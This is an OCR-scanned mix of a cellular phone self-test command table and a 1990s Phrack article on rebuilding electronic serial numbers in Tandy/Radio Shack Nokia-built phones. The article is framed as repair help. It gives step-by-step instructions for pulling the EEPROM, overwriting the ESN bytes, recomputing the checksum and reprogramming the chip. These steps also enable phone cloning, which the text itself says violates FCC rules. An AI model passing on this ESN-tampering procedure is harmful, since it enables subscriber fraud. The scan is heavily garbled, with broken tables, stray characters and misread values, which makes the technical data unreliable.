Table 1 shows the test commands and the corresponding results. 


INT 


ERNATIONAL CELLULAR PORTABL 


GJ 


Table 1. Test Commands For Self-Test Mode 


NOTES: 


Each command consists of at least two digits entered from the telephone 
keypad with the entry terminated using the (#) key. 
If the command relates to a test function with multiple data displays, 
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the (#) 
sequential test functions. 
resumes scanning. 


3. For commands that initiate an action that requires a respons 
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(#) 


key is used to pause at scanning data or to step through 
Entering the 


key during a pause time 


or that 


accumulates error counts, the ) key terminates the test. 
Keypad Entry Command Description Status Result 
Display 
# Enter Test Command 
Mode 
O1l#F Restart (Re-enter DC 
power startup routine 
O2# Radio Status Request AAAA=BB AAAA=Channel Number (decimal) 
BB=RSSI reading for channel 
CDEFGHI C=SAT Frequency 
0=5970 Hz 
1=6000 Hz 
2=6030 Hz 
3=No Lock 
D=Carrier (1=ON) 
E=Signaling Tone (1=ON) 
F=Power Attention Level (0-7) 
G=Mode (l=control channel 
O=voice channel 
H=Receive Audio Mute (1l=muted) 
I=Transmit Audio Mute (l=muted) 
When the radiotelephone is 
operating in the status display 
level of self-test, the 
information that is displayed 
alternates between AAAA BB 
and CDEFGHI. In the servicing 
level of self-test, only the 
information designated by 
CDEFGHI is displayed. 
03 (NOT USED) 
04 Initialize Carrier=OFF 
Transceiver Power Level=0 
Receive Audio=MUTED 
Transmit Audio=MUTED 
Signaling Tone=OFF 
SAT=OFF 
DTMF & Audio Tones=OFF 
Audio Path=TO SPEAKER 
O5# Carrier On Turn carrier on 
06# Carrier Off Turn carrier off 
NOTE: Use the PATH command (35A#) to select the audio path to test before 
using commands 07# through 10#. 
O07 Rx Mute Mute the receive audio 
08 Rx Un-mute Un-mute the receive audio 
09 Tx Mute Mute the transmit audio 
10 Tx Un-mute Un-mute the transmit audio 
11ABCD# Load Synth Load synthesizer with ABCD 
where ABCD = channel number 
in decimal (1329-2047, 0-600) 
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12# 


Set ATTN 


Set RF power attention to A 
where A=attention level (0-7; 
O=maximum power) 


13# 


RESET OFF 


This command should cause the 
Logic Unit to set WATCH DOG 
low and result in power-down 
of the radiotelephone. 


14 


STON 


Transmit signaling tone 10khz 


154 


STOFF 


Stop transmitting signaling 
tone 10khz 


16 


SETUP 


Transmit a five word reverse 
control channel message; each 
of the five words will be 
"FFOOAA55CC33". The trans-— 
mitter de-keys at end of 
message 


17# 


VOICI 


GI 


Transmit a two word reverse 
voice channel message; both 
words will be "FFOOAA55CC33". 
The transmitter de-keys at end 
of message. 


18# 


SEND NAM 


AA = Address BB = Data 
Displays contents of NAM, one 
address at a time, advanced 
by pressing the (*) key. 

Note the address goes up to 1f 


19# 


VERSION 


Displays software version 
number as "year, week" 


NOTE: Entering commands 20# through 23# or 27# causes the transceiver to 


begin a counting sequence or continuous transmission as described below. 
In order to exit from the commands to enter another test command, the (#) 


key must be depressed; 


all other key depressions are ineffectual. 


20# 


RCVS 1 


Receive control channel 
messages counting correctable 
and uncorrectable errors. 
When the command starts, the 
number of the command will be 
displayed in the right hand 
side of the display. Entering 
a # key will terminate the 
command and display a two 
three digit number in the 
display. The first number 

is the number of correctable 
errors and the second is the 
uncorrectable errors. 


21# 


RCVV 1 


Receive voice channel 
messages counting correctable 
and uncorrectable errors. 
When the command starts, the 
number of the command will be 
displayed in the right hand 
side of the display. Entering 
a # key will terminate the 
command and display a two 
three digit number in the 
display. The first number 
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is the number of correctable 
errors and the second is the 
uncorrectable errors. 


22# 


WSTS 


Receive control channel 
messages counting word sync 
sequence. When the command 
starts, the number of the 
command will be displayed in 
the right side of the display. 
Entering a # key will 
terminate the command and 
display the number of word 
sync sequences in the display. 


23¢ 


WSTV 


Receive voice channel 
messages counting word sync 
sequence. When the command 
starts, the number of the 
command will be displayed in 
the right side of the display. 
Entering a key will 
terminate the command and 
display the number of word 
sync sequences in the display. 


24 


(NOT USI 


eal 
is) 
aS 


25A 


SATON 


Enable the transmission of 
SAT where A = SAT frequency. 
See chart below. 

A SAT Freq. 

0 5970 Hz 

1 6000 Hz 

2 6030 Hz 


264 


SATOFF 


Disable the transmission of 
SAT. 


27 


TRANSMIT DATA 


TX continuous control channel 
data. 


32 


CLEAR 


Clears non-volatile memory. 
Clears all stored numbers. 


33 


Turn DTMF on. 


34 


DTMF 


Turn DIMF off. 


35 


DISPLAY RSSI 


'D’ series portable only. 


35A 


SET AUDIO PATH 


Where A = the following... 
1 = Speaker 

2 = Microphone 

3 Earpiece 


38 


DISPLAY ESN 


Displays ESN in four steps, 
hit * till back at start. 


(NOT USED) 


Enables diversity. 


Disables diversity. 


Disables diversity. 


Disables diversity. 


Returns the RSSI reading 
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taken on the current channel. 
The number is disp] 
three digit decimal 


layed as a 
1 number. 


46 


H 
Gq 
n 
ea 
iw) 


47A 


EV Set audio level where A=] 
(O=lowest, 15=highest). 17 
normal level is 2. 

NOTE: Use 8 to 12 only for 
DIMF applications. 


level 
The 


48 


SIDE 


[TONE ON Enable sidetone (Command 05# 
must also be executed. 


49 


SIDE 


ONE OFF Disable sidetone (Command 06# 
must also be executed. 


50 


MAINN 


displayed: 


incorrect. 


Not normally used. 
transmission/reception with 
transmit path connected 
externally to receive path. 
Maintenance data is trans-— 
mitted and test results 


Tests 


data 


PASS= received data is correct 
FAIL=2-second timeout, 
received, or received data is 


no data 


51# 


MAIN 


L Tests data paths internal to 


looped-back data, 


the logic unit, where 
maintenance data is trans- 
mitted and looped back. 
Display is as follows: 
PASS= received data is correct 
FAIL=2-second timeout, 
or 

looped-back data is incorrect. 


no 


52A 


(NOT 


USED) 


53 


(NO 


USED) 


54 


(NO 


USED) 


2) 


O01. 02051 
O02. XxXxXXXXXX 


DISP 


LAY /PROGRAM NAM Displays the contents of the 


amming details. 


NAM, one step at a time, 
vanced by depressing the 
key. Only the last 7 digits 

of data are displayed. Refer 
to NAM programming instruct-— 
ions in this manual for progr- 


- System ID umber. Vodaphone=02051 Cellnet=03600 


- A option byte (in binary) 


Local use (bit A7) if set to 1 mobile will 
respond to local control orders in the home 
area. Assigned by system operator. 
Preferred system (bit A6) applies to units 
capable of operating on two service systems 
0 = system B 1 = system A 


End-to-end signaling (bit A5) when enabled| 
indicates mobile is equipped for DTMF via 


ad- 
(®) 
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03. 
04. 
05. 
06. 
O07. 
08. 
09. 


10. 
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0) 

aL 

a 

0) 

0) 
XXXXXXXXXX 
XXXXXXXXXX 
17 
09 
XXXXXX 
XXX 
XXXXXXXX 

0) 

0 

0 

0) 

1 
1 
0) 
) 
XXXXXXXX 
0 


-— C option byte 
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the keys after the landline connection is 
mad 1 = enabled 0 = disabled 
Bit not used (bit A4) 


Repertory (bit A3) indicates the mobile is 
equipped with speed-dialing storage. 
1 = enabled 0 = disabled 
Aux alert (bit A2) when enabled, user can 
place the mobile in aux alert mode and be 
notified of incoming call via an aux device 
1 = enabled 0 = disabled 
H/F auto mute (bit Al) when enabled, mobile 
will automatically be in the mute mode when 
a call is made using the hands-free mode 
1 = enabled 0 = disabled 


Minmark (bit AO) supplied by system operator 
when enabled the users MIN2 will be sent 
with each call initiated or answered. 

1 = 0 = disabled 


— Mobil 
—- 10 digit min 

-— Station class mark 

- Access overload class 
— Security code 
- Lock code 

- B option byte 


phone number 
(15 highest priority) 


(in binary) 


bit b7 not used 
bit b6 not used 
bit b5 not used 


Extended field (bit b4) when enabled, th 
mobile would scan more than 32 paging ch. 
currently not used in UK. 

Single system scan (bit b3) if set to 1 
the mobile will scan only 1 system based 
on the setting of option byte A bit 6 


1 = enabled 0 = disabled 
Auto recall (bit b2) this option allows the 
user to access repertory by a l or 2 digit 
send sequence 

1 = enabled 0 = disabled 
Disable service levels (bit bl) if set to l 


service levels couldn’t be changed from the 
control unit. 

0 = enabled 1 = disabled 
Lock code (bit b0O) when enabled, allows the 
user to lock and unlock the mobile using 
the three digit lock code. 

0 = enabled 1 = disabled 


(in binary) 
User NAM programming (bit c7) when enabled 
allows user to program NAM from handset 

0 = enabled 1 = disabled 
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Vis 


12: 
13°, 
14. 
15. 
16. 


Wed Apr 


XXXXXXXX 


- D option byte 


— Initial paging system 0023=Vodaphon 
— Initial paging channel A 
— Initial paging channel B 
- Dedicated paging channels 
- E option bytes 
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Single/Dual system (bit c6) O=single 1=dual 
Call timer (bit c5) when enabled, the user 


can access the call timer. 
1 = disabled 
Auto re-dial (bit c4) 
0 = enabled 1 = 
Speaker disable (bit c3) enable or disable 
handset speaker when fitting hands free 
0 = enabled 1 = disabled 


Selectable system (bit cl) 
select primary system. 
0 = enabled 1 = disabled 


allows user to 


(in binary) 


Max volume (bit d7) sets max vol to step 4 
Theft disable (bit d6) when set to 1, 
alarm is not accessible. 


Beeper disable (bit d5) 1l=disable 
EXT DITMF (bit d4) when clear, DTMF is routed 
directly through APC. 
Flashing roam (bit d3) if enabled, roam 
light will flash when home area roaming. 

1 = enabled 0 = disabled 


(bit d2) if disabled, 


theft 


Audio convenience 


audio levels are re-centered on power up. 
0 = enabled 1 = disabled 
Time rx calls (bit dl) call timers will 


s when enabled 


accumulate on incoming call 
1 = enabled 0 = disabled 
Charge rate (bit d0) when enabled,telephon 
will respond to charge rate information 
1 = enabled 0 = disabled 


0323=Cellnet 


(in binary) 


bit e7 not used 

bit e6 not used 

bit e5 not used : Me 

bit e4 transportable speak c present 
bit e3 not used 

bit e2 not used ° 
bit el not used 
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[eg Be a Fei Mem, gee Tot hag yy Op Pep ste ee Re nee re ee | 

| 1 Word sync scan disable (bit e0) portable | 

| use only | 

56 (NOT USED) 

57 (NOT USED) 

58 COMPANDER ON Turn compander ON 

59 COMPANDER OFF Turn compander OFF 

60# and 61# (NOT USED) 

61 ESN TRANSFER For series I or 1? and MINI 
TACS - Probably Micro TACS. 

62 RNG-ON Turn the APC ringer audio 
path ON. 

63 RNG-OFF Turn the APC ringer audio 
path OFF. 

64 PLT-ON Turn the APC transmit pilot 
path on. 

65 PLT-OFF Turn the APC transmit pilot 
path off. 

66# thru 71# (NOT USED) 

66 IDENTITY TRANSFER Series II and some current 
portables. 

68 DISPLAY FLEX AND 

MODEL INFO 
69 USED WITH IDENTITY 
TRANSFER 
72 MODULATION GAIN Refer to the Portable 
ADJUST Telephone Phasing section for 
use of this command. 

713# POWER OUTPUT ADJUST Refer to the Portable 
Telephone Phasing section for 
use of this command. 

(0 to 7.) 
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TANDY / RADIO SHACK CELLULAR PHONES 


REBUILDING ELECTRONIC SERIAL NUMBERS AND OTHER DATA 


By Damien Thorn 


LEGAL CRAP 


(mandated by our cheap-suit, can’t afford cigars, polyester-pants-wearing, 
no-practice-having, almost dis-barred, old-fart legal counsel who only charges 
us $20 / hour because he meant to retire when he was 70 but lived a few years 
longer than h xpected...hell, we love him!) 


Contents copyright 1994, 1995 Phoenix Rising Communications. 
Software copyright 1993, 1994, 1995 as indicated. 


All Rights Reserved. Distribution of contents in hard-copy form is forbidden. 
Redistribution in electronic form is permitted only as outlined in the Phrack 
licensing agreement, provided this article is not segregated from the other 
editorial contents of Phrack #48. 


Use caution when rebuilding corrupt serial numbers, and avoid lending your 
talents to further the goals of unscrupulous people. 


Altering the serial number of a cellular transceiver is a violation of the 
FCC rules, and the U.S. Secret Service is charged with the responsibility 
of investigating fraudulent activity. 


All of this material was developed in-house and not provided or 

endorsed by the manufacturer. Brand names and trademarks are used for 
identification purposes only and are the property of their respectiv 

owners. Use of same within this article definitely does not imply agreement 
with or endorsement of the material presented, and probably aggravates them 
to no end. There are no guarantees or warranties with regard to the accuracy 
of this article. Although we’ve done the best job that we can, we may be 
wrong. Happens all the time. If you damage a phone or inadvertently start 

a global thermonuclear war, that’s your problem. Don’t come crying to us, or 
make us fork over another twenty bucks to the old shyster. What you do with 
this information is your responsibility. 


INTRODUCTION 


While manufacturers publish service manuals for their cellular 
transceivers, they have an annoying habit of omitting certain 
data pertaining to memory devices and the arrangement of the data 
stored inside them. Since this stored information includes the 
electronic serial number (ESN), the lack of documentation can 
easily be excused as a way to avoid unwittingly facilitating 
fraud. 


The drawback to the ’security through obscurity’ approach is that 
service technicians who have a legitimate need to reprogram these 
memory devices are unable to do so. The Nokia-designed 
transceivers discussed in this article are an excellent exampl 
Since the ESN is stored in the same electrically-erasable 
programmable read-only memory (EEPROM) device as the numeric 
assignment module (NAM) information, corruption of the data can 
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be catastrophic to the operation of the phone. 


Since the handset programming mode of these Nokia units actually 
writ nables the memory device to store the alterable parameters, 
an errant pulse from the microprocessor, dropped bits or supply 
voltages falling out of tolerance can cause the ESN or checksum 
to become overwritten or otherwise rendered useless. Should this 
occur, dealers have had little recourse but to ship the 
transceiver back to the factory for repair. Until now, that is. 


The goal of Phoenix Rising Communications in producing this 
documentation is to empower technicians to do the job they have 

been educated and hired to perform. This guide to Tandy and 

Radio Shack cellular phones will enable the technician to rebuild the 
corrupt data within this series of transceivers with confidence. 


The information in this article was developed from the installed 
and transportable versions of the most commonly purchased phones 
from Radio Shack stores. These units were sold for many years, 
and finally replaced last year with a new, redesigned model. The 
data presented here can probably be applied to certain compatible 
Nokia transceivers as indicated later in the text. 


CHAPTER 1 


This publication is designed to provide supplemental information 

to assist in the servicing of cellular mobile telephones 

manufactured by Tandy Corporation under license from the Nokia Corporation. 
It is not meant to be a replacement for the factory service manual. 

Any shop needing to perform component level repairs should 

definitely obtain the factory documentation from Tandy National 

Parts. 


Our primary goal is to explain the contents of the numeric 
assignment module, or NAM. In these particular phones, both the 
NAM parameters and the electronic serial number (ESN) are stored 
within the same electrically erasable programmable read-only 
memory (EEPROM) device. 


The problem inherent with this engineering decision is that the 

ESN stored within this chip is not necessarily permanent. Since the 
chip can be erased or reprogrammed, certain circumstances could 
possibly cause the ESN to become corrupt. These include improper 
signals from the microprocessor, induced currents or a power 
interruption during NAM programming as the write cycle is taking 
place. 


Since the available service literature does not describe the 
functions of this serial EEPROM or the data contained within, 
service personnel would have to return the transceiver to the 
manufacturer for service. This is not cost effective in terms of 


time or money for either the shop or cellular customer. 


Technicians who invest a little time to become familiar with the 
data stored within the NAM circuitry, including the placement of 
the ESN and checksum byte can service these types of problems 
in-house and with little difficulty. 


Basic instructions for peaking the transceiver’s RF sections have 
also been included herein as a convenience. While the phone is 
open and on the test bench, the customer’s transceiver should 
also be given a quick check for proper alignment. 


EQUIPMENT REQUIRED 


Other than basic hand tools, disassembly of the phone requires a 
soldering iron with a medium sized tip and a vacuum de-soldering 
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tool. Good size solder removal braid may be used in conjunction 
with, or in lieu of the de-soldering tool. 


5 


To correct data that has become corrupted within the EEPROM, a 
programming device is required capable of reading and burning an 
8-pin DIP integrated circuit. One such inexpensive device is 
listed in appendix III. 


An individual who is familiar with the memory device involved has 
written a software program in the BASIC language to allow the 
programming of this chip via the parallel port of an 

IBM-compatible personal computer. The source code for this program 

can be found in the appendix, and is provided as a reference only. Such 
software is subject to the peculiarities of the host PC and 

therefore cannot be recommended for use in place of a standard PROM 
programmer. Older versions of GWBASIC are preferred to Microsoft’s 
current QBASIC interpreter. 


MODELS COVERED 


The information presented is believed to cover all of the installed 
and transportable (bag phone) cellular transceivers manufactured 

by the Tandy Corporation under license from the Nokia Corporation up 
until about a year ago. 


Tests have been conducted on a random selection of these phones 
with manufacture dates ranging from 1989 through early 1994. All 
versions of the "TP" firmware through January, 1994 should be 
supported. 


Although no house-branded OEM Nokia transceivers have been 

tested, we have surmised that this information is applicable to several 
models based on the same or a similar design. These models 
include the Nokia LX-11, M-11, M-10 and the Nokia-Mobira P4000 (PT612). 
Some of these units, like the very old Radio Shack equivalents, 

will require a service handset to program. More on that in the 

next issue of Phrack. 


HAND-HELD UNITS 


Only one of the hand-held cellular phones previously sold through 

Radio Shack utilizes a discrete surface-mounted integrated 

circuit to store the ESN and NAM parameters. If you have the capability 
to read and program this SOIC 93C46 memory device you may be able to 
extrapolate the PROM dumps in this guide to work with this phone. 


Due to the difficulty in disassembling this unit and the delicate 


nature of the surface-mounted EEPROM, the reader is cautioned 
against attempting to service these in-hous 


7] 


DISASSEMBLY 


Prior to disassembling the transceiver, all antenna and cables, 
including the handset, should be disconnected from the jacks on 
the unit. 


To aid in disassembly and component location, the original 

hard-copy version of this publication contained several pages of 
photographs. While the hard-copy version is available (see end of 
article), you will hopefully be able to figure out what we’re talking about 
without them. 


Disassembly begins by snapping the plastic end panel from the 

black transceiver cover. Some units just pop up and off, while others 
have two small plastic tabs on each side that must be depressed 

free the end panel for removal. 


With the end panel removed, the top plastic cover is now free to 
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slide off. With this cover removed, the metal transceiver itself 
can be dumped from the remaining plastic housing by turning it 
upside down, or pulling up on the metal heat sink assembly that 
comprises one side of the transceiver unit. 


There is a metal shield on each side of the transceiver (top and 
bottom.) One is a solid piece of thin sheet metal, and the other 

is broken up in to smaller, individual shields and soldered to 

the transceiver chassis. The shield that needs to be removed is the 
solid one. It is only held in place with the friction grips 

along the edges, and can be pried off with your fingers. 


Once the shield is removed from the proper side of the 

transceiver, the solder side of the logic board will be exposed. 

This board must be removed to gain access to the component side. Take 
static precautions so as not to fry the CMOS silicon that is currently 
hidden from view. 


Other than several connectors that mate between the two boards, 

the board is usually held in place by several blobs of solder spaced 
along the edge of the board. These small ’solder welds’ serve as 

a ground bond between the board and the transceiver chassis, and 

are not electrically necessary under normal circumstances. 


Once the solder ground bonds have been melted and removed with a 
de-soldering tool or solder wick, use a pair of needle-nose pliers 
to gently bend back the small metal tabs holding the circuit 

board in place. 


Before proceeding, inspect the foil side of the board to ensure 
that no solder has splashed on the board during de-soldering, and 
that the foil traces where the work was performed are still 
intact. This last step is where most trouble arises. These boards are 
delicate, and a heavy hand while prying or bending will almost 

ensure that a trace or five will be transected when the tool 

slips. If this happens, resolder the traces to undo the damage. 


At this point the logic board is held in place only by pins on 

the transceiver board sticking up in to sockets on the logic board. 
Gripping the edges of the logic board with your fingers and 

pulling straight up will disengage the connectors and allow the logic 
board to pull free of the transceiver. Slightly rocking the board from 
each side may aid in the removal. Do not grip the board with 

pliers or damage can result to the small chip resistors and other 
components mounted on the solder side of the board. 


Once dislodged, you’ll have two separate circuit boards. 


THE LOGIC BOARD 


The board that supplies logic and control functions for the 

cellular mobile telephone is easily identifiable by the 

microprocessor and 27C512 EPROM containing the operating 

firmware. The EPROM’s erase window is covered by a protective sticker 
that identifies the firmware version stored therein. Within the last 
few years, the version has ranged from TP-2 through TP-8. 


Also on this board is the serial EEPROM where the ESN and NAM 
parameters are stored. This chip is an 8-pin DIP located ina 
socket near pin #1 of the NEC microprocessor. It is usually 
covered with a small paper sticker bearing the last few digits of 
the serial number stored inside. 


While security experts may blast Nokia for designing a phone that 
stores the ESN in a socketed chip, and then says "here I am" by 
placing a sticker on it, this is a dream come true for any 
technician facing issues of data corruption. 
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The Serial EEPROM containing all of this data is a PCD8572 (or 
85C72) manufactured by Microchip Technology, Inc. 


This 8-pin device is a 1k (128x8) CMOS serial electrically 
erasable PROM. The pin configuration for the device can be found in the 
appendix. 


Power is supplied to this chip only when the microprocessor is 
performing a read or write operation. Transistor Q115 (surface 
mounted to the underside of the logic board right about in the 
middle) switches the supply voltage on and off. Should power be 
interrupted during the write cycle, the ESN may become corrupt. 


REBUILDING THE ESN 


To replace the damaged serial number, note the unit’s serial 

number from the cellular service agreement or the phone itself. 

The ESN (in decimal) is located on a white paper sticker applied to the 
side of the metal transceiver chassis. It is also stamped into the 
plastic model identification plate on one side of the plastic 

outer housing. 


For reprogramming, the ESN must be converted to hex. A scientific 
calculator or any number of public domain computer programs will 
simplify the task. 


CONTENTS OF NAM 


Once the original serial number has been determined, carefully 
remove the 8572 EEPROM from the socket and place it in the 
a 
c 


x 


dapter required by your PROM programmer. Reading the contents of the 
hip, you’ll see data as depicted below. 


Note that these data dumps are simulated for illustrative purposes. 


The ESN and encoded MIN bytes are not legitimate numbers, so don’t 
bother /’testing’ them. 


he first five bytes of data contain the security code. These 
bytes are the hex values representing ASCII characters 0 through 
9, thus represented as "3X" where "X" is the actual digit of the 
security code. A factory security code of 1 2 3 4 5 would be 
represented in bytes 00 through 04 as follows: 


31 32 33 34 35 


Since you will require the security code to enter handset 
programming mode, please note the current security code or 
program these bytes with your shop’s standard default. 


UNDERSTANDING ADDRESSES 


Some cellular technicians have little experience in the digital 
world. Service monitors and watt-meters ar xpensive and wonderful 
devices, but sometimes you need to do a little more than tweak a pot 
to fix a phone. The digital-literate can skip this oversimplified 
explanation. 


To assist those in reading the locations of the various bytes in the EEPROM, 
understand that each line (as usually displayed on a programmer) contains 
sixteen (16) bytes. The first line begins with byte 00, then O01, 02, 03, 
04, 05, 06, O7, 08, O09, OA, OB, OC, OD, OE and finally OF. 


The second line begins with 10, then 11, 12, 13, 14, 15, 16, 17, 
18, 19, 1A, 1B, 1C, 1D, 1E, and 1F as the last byte of the line. 
The third line increments the same way, except as byte 30, 31, 
etc., to 3F. You now know how to count in base 16 (hex)! 
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As an example, the locations used by the phone end at byte 3D, 
which contains 00 in the example below. Beginning with the next 
byte (3E), a repetitive pattern of alternating values of AA and 
55 are stored. This is just ’test’ data and is never read by the 
phone. The chip itself ends at byte 7F, and your PROM programmer 
may display FF following byte 7F to indicate the non-existence of 
these locations in the chip. 


8572 EXAMPLE DATA DUMP 


0000 31 32 33 34 35 OA FF 21 A5 38 25 82 OF 25 17 1A 
0010 00 00 00 00 24 15 Bl C3 24 04 A3 21 16 2D 11 AA 
0020 OA 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 «121 
0030 11 08 4D 01 OF O1 OF 00 04 00 00 00 FF 00 AA 55 
0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 


THE CRUCIAL SERIAL NUMBER 


The hex ESN for any given phone consists of four bytes, as we use 

the term here. Technically it is eight bytes (in hex, 32 bits if 
expressed in binary form), but we’re referring to a ’byte’ as a two-digit 
hex number, rather than each digit (byte) as a single entity. For our 
xample, we’re using the fictitious ESN of A521FFOA. All Radio Shack 

phones will have an ESN beginning with A5 hex. This is the "manufacturers 
code" prefix that has been assigned to Tandy. 


Breaking the ESN into four bytes as viewed on the PROM programmer, 
the ESN would appear as: 


A5 21 FF OA 


Refer back to the example dump of the data within the 8572 IC. 
Immediately following the security code is the ESN stored in 
reverse order. With the security code occupying bytes 00 to 04, 
the ESN is located in bytes 05, 06, O07 and 08. Byte 09 contains 
the value 38. It should always contain 38. 


In th xample, beginning with byte 05 you can read the ESN (in 
reverse sequence) as: 


OA FF 21 A5 


Th xamples below will assist you in visualizing the bytes 
containing the security code and the electronic serial number. 

The programming and placement of these two crucial pieces of data is 
fairly straight forward. Using the buffer editor function of the 
PROM programmer, you can simply type over the garbage that may be 
present in these locations with the correct values for the 

security code and the ESN. Double check your data entry! 


OTHER ADDRESSES 


The entire NAM data is stored in the remaining locations of this 
chip. Bytes OA, OB and OC contain the firmware revision date, 

and bytes OD - OF contain the installation date as programmed via the 
handset programming mode. 


Other bytes contain the encoded Mobile Identification Number 
(MIN), Station Class Mark (SCM), etc. 


These various bytes do not need to be reprogrammed through your 
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PROM burner, as they can all be corrected via handset 

programming. Only the security code and ESN must be properly reprogrammed 
directly to the chip itself. For more information on the locations 

of this other data, refer to the source code in Appendix A. It 

allows you to see where (and how) this other data is stored within 

the NAM. 


The last item to program is the checksum. 


E 


HE SECURITY CODE: BYTES 00 - 04 


0000 31 32 33 34 35 XX XX XX XX XX XX XX XX XX XX XX 


THE ESN BYTES 05 - 08 
0000 XX XX XX XX XX OA FF 21 A5 XX XX XX XX XX XX XX 
LOCATING THE CHECKSUM 
There is a one byte device checksum stored within the 8572 that 
is used by the phone to check the integrity of the data stored 
therein. The checksum is located at byte 3D, indicated by "XxX" 
in the example below. 


The checksum is derived from all the data stored in the NAM, not 
just the ESN. Computing it is relatively easy as it is simply 
t 
u 


he sum (in hex) of all the values from bytes 00 through 3C as 
nderlined below. 


Assuming the PROM programmer has a checksum function, you can 

enter the beginning address as 0000 and the ending address as 003C. 
The software will add all of the values between these locations and 
give you the sum. The alternative is to add the numbers manually 
u 
t 
a 


Sing the hex mode of a scientific calculator. Either way, adding 
he hex values of all the bytes between 00 and 3C of our example yields 
sum of OB5E. 


The least significant two-digit byte is the actual device 
checksum that would be programmed in location 3D. In our example, the 
least significant half is 5E. Ignoring the most significant half of 


om 


the sum (0B), a value of 5E must be programmed to location 3D. 


Note that the checksum will be recomputed and change after 

handset programming. When the MIN or other data is changed, it alters 
the values in various bytes. The checksum encompasses all of the 

data stored within the chip used by the transceiver’s firmware. 


CHECKSUM LOCATION 


0000 31 32 33 34 35 OA FF 21 A5 38 25 82 OF 25 17 1A 
0010 00 00 00 00 24 15 Bl C3 24 04 A3 21 16 2D 11 AA 
0020 OA 00 00 64 6C B3 32 00 27 00 01 01 11 11 :11~«121 
0030 11 08 4D 01 OF O1 OF 00 04 00 00 00 FF XX AA 55 
0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 


BYTES SUMMED TO DERIVE CHECKSUM 


0000 31 32 33 34 35 OA FF 21 A5 38 25 82 OF 25 17 1A 
0010 00 00 00 00 24 15 Bl C3 24 04 A3 21 16 2D 11 AA 
0020 OA 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 «121 
0030 11 08 4D 01 OF O1 OF 00 04 00 00 00 FF 
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0040 
0050 
0060 
0070 


DEFAULT VALUES 


In the event that all of the data stored within the NAM becomes 
corrupt, the technician will need to program the security code, 

the ESN, and certain default data values to allow the phone to power 
up. Once powered up, all of the other data can be automatically 
reconstructed by the phone using the handset programming mode. 


Since the factory does not provide any information about the 


contents of the 8572 EEPROM, we are unsure of the function of 
this ‘default data.’ It seems to have little significance. 


The underlined bytes depicted below are fairly typical. Ideally 
the technician should compare the contents of an operational 
phone with equivalent firmware to determine the values for the 
u 

p 


nderlined locations, but if this is not possible then the values 
rovided in the example may suffice. 


Once these defaults have been programmed in the proper locations, 
and the ESN and security code have been reconstructed, compute 
the checksum and store it in address 3D. Temporarily reassemble th 


phone and apply power. The unit should power up and complete it’s 
self-test which will include the operation where the microprocessor 
computes the NAM checksum and compares it to the value stored in 
location 3D. 


Assuming the self-diagnostics pass, the remaining data can now be 
reconstructed through normal handset programming. 


The handset programming template applicable to most of these 
units is located immediately following the appendix detailing the chip 
programming software included for reference purposes. 


DEFAULT DATA VALUES 


0000 XX XX XX XX XX XX XX XX XX 38 XX XX XX KX XX XX 
0010 00 00 00 00 XX XX XX XX XX XX XX XX XX XX XX XX 
0020 XX XX XX XX XX XX XX 00 27 00 01 01 11 11 11 «121 
0030 11 08 4D 01 OF O1 OF 00 04 00 00 00 FF XX AA 55 
0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 
0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 


ADDITIONAL NOTES 


As discussed, the parallel port programming software interface 

has a few quirks, most involving the programming voltage supplied to 
the chip. If all else fails, and a PROM burner is not available, 
take the supply voltage (Vcc) directly from the logic board. 


Run test lead jumpers from pins #4 and #8 of the IC socket on the 
logic board that held the 8572 EEPROM and connect to the 
respective pins on the socket attached to the cable to be used for 
programming. Turn the board over and locate surface mount 
transistor Q115 which switches the supply voltage to the IC 

socket on and off. 


This small chip transistor is directly to the left of pin #8 (of 
the 8572 socket) and can be positively identified by the circuit 
trace from socket pin #8 leading directly to the emitter of Q115. 
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By examining this area of the board, you can determine which of 

the other two traces connects to the transistor’s collector. 

Jumpering the traces and shorting the collector and emitter simply 
provides a constant, conditioned voltage supply to the socket designed to 
power the 8572 in programming mode. It may also be necessary to cut the 
trace to the base of Q115. 


Once the chip has been programmed with the software, restore th 
integrity of the cut trace to the base of Q115 and remove the 
short between the collector and emitter. 


USING THE SOFTWAR 


GJ 


= 


he Cellular Data Repair Utility software requires that you first 
create a small text file using an ASCII text editor such as DOS’s 
"EDIT" utility program. 


This text file must contain the data described below in the 
specific order presented. The data in this image (.img) file 
will be programmed into the 8572. 


XXX ESN Prefix (decimal) 
XXXXXXXX ESN (8 digits decimal) 
XXXXX SIDH (5 digits decimal) 
1 Access Bit 

a .ocal Option Bit 
AAAPPPXXXX MIN (10 digits) 
08 SCM 

OXXX (0333 or 0334) 

10 Access Overload Class 
1 Pref. System Bit 

10 GIM 

12345 Security Code 


EXAMPLE IMAGE 
Filename: TEST.IMG 


165 
00246812 
00031 

1 

1 
5105551212 
08 

0334 

10 

1 

10 

12345 


PROGRAMMING 


Once the image file containing the appropriate data has been 

saved, run the software with QBASIC or Microsoft BASIC and follow the 
prompts. Be sure to set the proper parallel port address in line 
1950 to reflect the port to which the interface is connected 

first. 


TUNING ST! 


Gl 


PS 


1) With a digital voltmeter attached to the positive terminal 
of C908, adjust VR908 to provide a reading of 8 vde (q 0.1 volt). 


2) With the voltmeter attached to the positive terminal of 
C913, adjust VR918 for a reading of 8 vde (q 0.1 volt). 
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3) Connect the voltmeter to test point TXV and enter diagnostic 
command 0, 1, SEL, 9, END. Adjust C676 to achieve a reading of 5 
vde control voltage (q 0.1 volt). 


4) Check receiver control voltage with test point RXV. Adjust 
C614 for a reading of 4 vde (q 0.1 volt). 


5) With a power meter connected to the antenna connector of 

